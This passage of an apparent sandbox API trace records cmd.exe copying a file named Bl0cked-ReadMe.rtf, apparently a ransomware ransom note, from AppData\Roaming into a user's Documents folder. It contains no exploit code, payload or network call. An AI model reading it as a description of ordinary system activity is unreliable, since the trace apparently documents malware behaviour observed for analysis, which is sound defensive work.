| out: lpBuffer=0x16fd3c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.437] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fd3c, dwLength=0x1c | out: lpBuffer=0x16fd3c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.437] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fd3c, dwLength=0x1c | out: lpBuffer=0x16fd3c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.437] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fd3c, dwLength=0x1c | out: lpBuffer=0x16fd3c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0139.437] GetConsoleOutputCP () returned 0x1b5 [0139.461] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.462] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.462] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.465] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.465] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.465] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.465] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.466] GetEnvironmentStringsW () returned 0x250188* [0139.466] FreeEnvironmentStringsW (penv=0x250188) returned 1 [0139.466] 
GetEnvironmentStringsW () returned 0x250188* [0139.466] FreeEnvironmentStringsW (penv=0x250188) returned 1 [0139.466] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ecdc | out: phkResult=0x16ecdc*=0x40) returned 0x0 [0139.466] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0xb0, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x1, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0x1, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x0, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x40, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x40, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0x40, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] 
RegCloseKey (hKey=0x40) returned 0x0 [0139.467] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ecdc | out: phkResult=0x16ecdc*=0x40) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0x40, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x1, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0x1, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x0, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x9, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x4, lpData=0x16ece8*=0x9, lpcbData=0x16ece0*=0x4) returned 0x0 [0139.467] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ece4, lpData=0x16ece8, lpcbData=0x16ece0*=0x1000 | out: lpType=0x16ece4*=0x0, lpData=0x16ece8*=0x9, lpcbData=0x16ece0*=0x1000) returned 0x2 [0139.467] RegCloseKey (hKey=0x40) returned 0x0 [0139.467] time (in: timer=0x0 | out: 
timer=0x0) returned 0x5b88636e [0139.467] srand (_Seed=0x5b88636e) [0139.467] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0139.467] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0139.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.468] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2518e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.468] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.468] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.468] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.468] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.468] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.468] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.468] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.468] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.468] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.468] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.468] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.468] SetEnvironmentVariableW (lpName="PROMPT", 
lpValue="$P$G") returned 1 [0139.468] GetEnvironmentStringsW () returned 0x2522d8* [0139.468] FreeEnvironmentStringsW (penv=0x2522d8) returned 1 [0139.468] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.468] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.468] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.468] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.468] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.468] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.468] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.468] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.468] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.468] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.469] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16faa8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.469] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16faa8, lpFilePart=0x16faa4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16faa4*="Desktop") returned 0x18 [0139.469] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.469] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f824 | out: lpFindFileData=0x16f824) returned 0x250018 [0139.469] FindClose (in: hFindFile=0x250018 | out: hFindFile=0x250018) returned 1 [0139.469] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f824 | out: lpFindFileData=0x16f824) returned 0x250018 [0139.469] FindClose (in: hFindFile=0x250018 | out: hFindFile=0x250018) returned 1 [0139.469] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", 
lpFindFileData=0x16f824 | out: lpFindFileData=0x16f824) returned 0x250018 [0139.469] FindClose (in: hFindFile=0x250018 | out: hFindFile=0x250018) returned 1 [0139.469] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.469] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.469] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.469] GetEnvironmentStringsW () returned 0x252af8* [0139.470] FreeEnvironmentStringsW (penv=0x252af8) returned 1 [0139.470] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.470] GetConsoleOutputCP () returned 0x1b5 [0139.470] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.470] GetUserDefaultLCID () returned 0x409 [0139.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fbe8, cchData=128 | out: lpLCData="0") returned 2 [0139.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fbe8, cchData=128 | out: lpLCData="0") returned 2 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fbe8, cchData=128 | out: lpLCData="1") returned 2 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0139.483] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.483] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.484] GetConsoleTitleW (in: lpConsoleTitle=0x2408e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.485] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.485] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.485] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.485] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.486] _wcsicmp (_String1="type", _String2=")") returned 75 [0139.486] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0139.486] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0139.486] _wcsicmp (_String1="IF", _String2="type") returned -11 [0139.486] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0139.486] _wcsicmp (_String1="REM", _String2="type") returned -2 [0139.486] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0139.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.490] GetFileType (hFile=0x7) returned 0x2 [0139.509] GetStdHandle 
(nStdHandle=0xfffffff5) returned 0x7 [0139.509] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16fae0 | out: lpMode=0x16fae0) returned 1 [0139.521] _dup (_FileHandle=1) returned 3 [0139.521] _close (_FileHandle=1) returned 0 [0139.522] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0139.522] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16fab0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0139.522] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0139.522] GetConsoleTitleW (in: lpConsoleTitle=0x16f8e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.522] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0139.522] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0139.522] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0139.522] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0139.523] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.523] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x16f444, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f444) returned 0x240e78 [0139.523] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0139.523] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0139.523] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0139.523] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: 
"c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16e350, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0139.524] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0139.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.524] GetFileType (hFile=0x54) returned 0x1 [0139.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.524] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x16e3a8 | out: lpFileSizeHigh=0x16e3a8*=0x0) returned 0x1632 [0139.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.524] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.524] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.524] GetFileType (hFile=0x4c) returned 0x1 [0139.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.524] GetFileType (hFile=0x4c) returned 0x1 [0139.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.524] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.525] GetFileType (hFile=0x4c) returned 0x1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.525] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.525] _get_osfhandle (_FileHandle=1) returned 
0x4c [0139.525] GetFileType (hFile=0x4c) returned 0x1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.525] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.525] GetFileType (hFile=0x4c) returned 0x1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.525] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.526] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.526] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: 
lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.527] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.527] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | 